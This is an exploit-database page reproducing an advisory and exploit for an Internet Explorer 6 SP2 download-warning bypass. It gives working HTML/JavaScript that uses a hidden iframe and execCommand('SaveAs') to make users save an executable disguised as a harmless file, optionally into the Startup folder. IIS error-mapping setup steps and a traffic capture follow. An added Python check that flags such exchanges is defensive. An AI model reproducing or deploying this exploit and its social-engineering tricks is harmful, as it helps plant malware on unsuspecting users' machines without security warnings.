0day.today - Biggest Exploit Database in the World.
==================================================================
MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass
==================================================================

Original advisory and exploit by cyber_flash (Vengy)

Circumvent Windows XP SP2 security features using the execCommand 'SaveAs' function!

Demonstration:

Notice that you don't receive any warning messages such as "File Download - Security Warning" or "Open File - Security Warning". If "Hide file extensions for known file types" (Tools->Folder Options...->View) is enabled (i.e., 'funny joke.exe' appears as 'funny joke'), it's possible to trick a user into downloading a malicious executable file masquerading as an HTML document! Windows XP SP2 normally prevents direct downloading. For example: calc.exe

Description:

When your browser cannot locate the URL that you entered in the address bar, you receive a 404 error message telling you that the file was not found. This exploit utilizes a custom HTTP 404 error message (v.exe) and eventually feeds it to the execCommand method. User input is required because the method always prompts with a "Save HTML Document" dialog.

1. Bypasses the "File Download - Security Warning". Each time you click a download link, WinXP pops up a "File Download - Security Warning", making you aware that Windows is downloading a program and asking for your permission to complete the download process.

2. Bypasses the "Open File - Security Warning". Launching a downloaded executable that originates from an untrusted location (zone) such as the Internet also brings up an "Open File - Security Warning" that asks for permission to run the file in case it's dangerous.

The execCommand method:

Executes a command on the current document. One of the many parameters of this method is the SaveAs command, which saves the current Web page to a local file. The SaveAs command has the following format:

    document.execCommand('SaveAs','1','Name of the webpage.htm');

Platforms Tested:

* Microsoft Windows 2000 Server
* Microsoft Windows XP Professional (IIS V5.1)
* Internet Explorer Version: 6
* NOT tested on Windows 2003 Server.

Exploit:

The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches:

    <html>
    <body>
    <iframe src='http://your.domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>
    Click <a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>.
    </body>
    </html>

Also, here's an example that requires modifying the IIS Error Mapping Properties (see below):

    <html>
    <body>
    <iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>
    Click <a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>.
    </body>
    </html>

NOTE: Using 'C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\funny joke.exe' will place the file into the user's Startup folder!

The file v.exe (replace it with any file you like) within the IFRAME src attribute will be delivered to the user upon saving.

Steps to configure IIS:

Launch Internet Information Services manager. Under the 'Custom Errors' tab, modify the Error Mapping Properties as follows:

1. Error Code: 404
2. Default Text: Not Found
3. Message Type: URL
4. URL: /v.exe (name of the executable which you'd like to send to the user. ;)

Within the HTML page, insert an IFRAME as follows:

    <iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so it'll trigger a 404 error message as defined above.
But the JavaScript code below references the stealthy v.exe data within the frame 'NotFound', and it is piped to 'funny joke.exe' when the user is prompted to save the file:

    javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');

Follow TCP Stream:

Here's what occurs internally when fetching the exploit webpage plus the 404 error message (v.exe).

    GET /// HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    If-Modified-Since: Tue, 16 Nov 2004 02:34:44 GMT
    If-None-Match: "7e5914d584cbc41:10d2"
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: insecure.hopto.org:53
    Connection: Keep-Alive

    HTTP/1.1 304 Not Modified
    Server: Microsoft-IIS/5.1
    Date: Tue, 16 Nov 2004 12:31:00 GMT
    Content-Location: http://insecure.hopto.org:53/index.htm
    ETag: "7e5914d584cbc41:10d2"
    Content-Length: 0

    GET ///vengy404.htm HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: insecure.hopto.org:53
    Connection: Keep-Alive

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.1
    Cache-Control: no-cache,no-transform
    Expires: Tue, 16 Nov 2004 12:31:00 GMT
    Content-Location: http://insecure.hopto.org:53/v.exe?404;http://insecure.hopto.org///vengy404.htm
    Vary: *
    Date: Tue, 16 Nov 2004 12:31:00 GMT
    Content-Type: application/octet-stream
    Accept-Ranges: bytes
    Content-Length: 91408

    <---V.EXE binary data goes here --->

Conclusion:

Overall, IE attempts to intercept risky code and prompts a security warning message, but it seems to allow custom HTTP errors to filter through those security checks. Also, by creating a 404 .lnk shortcut file with a hotkey of 'Enter', saving it to the desktop installs a global hotkey, so it may be possible to execute the downloaded file by simply forcing the user to press the Enter key: "alert('Thanks. Press Return')".
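As an added defender-side example, not part of the original advisory: a check over captured request/response pairs like the stream above. It flags a 200 OK that serves application/octet-stream for a .htm request, and a Content-Location whose path names an executable while the request named a document (the IIS error mapping appends the URL that 404'd after the '?404;' marker, so the mapped v.exe shows up there). The sample header strings are constructed from the capture above; the indicator tag names are my own.

```python
from urllib.parse import urlsplit

EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".lnk"}
DOCUMENT_EXTS = {".htm", ".html"}

def path_ext(url_or_path):
    """Extension of the path component only, so '/v.exe?.htm' -> '.exe'."""
    path = urlsplit(url_or_path).path
    dot = path.rfind(".")
    return path[dot:].lower() if dot > path.rfind("/") else ""

def parse_headers(raw):
    """Split a raw HTTP head into (start line, {lower-cased name: value})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def check_exchange(request_raw, response_raw):
    """Return indicator tags for one request/response pair (empty = clean)."""
    req_line, _ = parse_headers(request_raw)
    status_line, rsp = parse_headers(response_raw)
    target = req_line.split(" ")[1]
    status = status_line.split(" ")[1]
    ctype = rsp.get("content-type", "").split(";")[0].strip().lower()
    location = rsp.get("content-location", "")
    findings = []
    # The browser asked for an HTML document, but the 200 carries a raw binary.
    if status == "200" and path_ext(target) in DOCUMENT_EXTS \
            and ctype == "application/octet-stream":
        findings.append("binary-for-document-request")
    # IIS error mapping: Content-Location names the mapped file (here v.exe)
    # and appends the URL that 404'd after the '?404;' marker.
    if path_ext(location) in EXECUTABLE_EXTS and path_ext(target) in DOCUMENT_EXTS:
        findings.append("error-mapping-serves-executable")
    return findings

# Constructed sample: the two exchanges from the capture above (header subset).
REQUEST_INDEX = "GET /// HTTP/1.1\nHost: insecure.hopto.org:53"
RESPONSE_INDEX = ("HTTP/1.1 304 Not Modified\nServer: Microsoft-IIS/5.1\n"
                  "Content-Location: http://insecure.hopto.org:53/index.htm\n"
                  "Content-Length: 0")
REQUEST_404 = "GET ///vengy404.htm HTTP/1.1\nHost: insecure.hopto.org:53"
RESPONSE_404 = ("HTTP/1.1 200 OK\nServer: Microsoft-IIS/5.1\n"
                "Content-Location: http://insecure.hopto.org:53/v.exe?404;"
                "http://insecure.hopto.org///vengy404.htm\n"
                "Content-Type: application/octet-stream\nContent-Length: 91408")

if __name__ == "__main__":
    print(check_exchange(REQUEST_INDEX, RESPONSE_INDEX))  # []
    print(check_exchange(REQUEST_404, RESPONSE_404))
```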
Funny and scary how a few well-placed characters, <iframe src='v.exe?.htm' ...., can confuse the IE monster, whereas specifying <iframe src='v.exe' .... is handled correctly - wow! Combined with existing exploits, might it be possible to save the data locally without user interaction? Anyhow, I'm positive there are many hidden exploits out there which are used to gain entry into our PCs regardless of how many patches M$ might supply. Geez, my computer is probably owned right now ... ahhhh...

# 0day.today [2024-12-25] #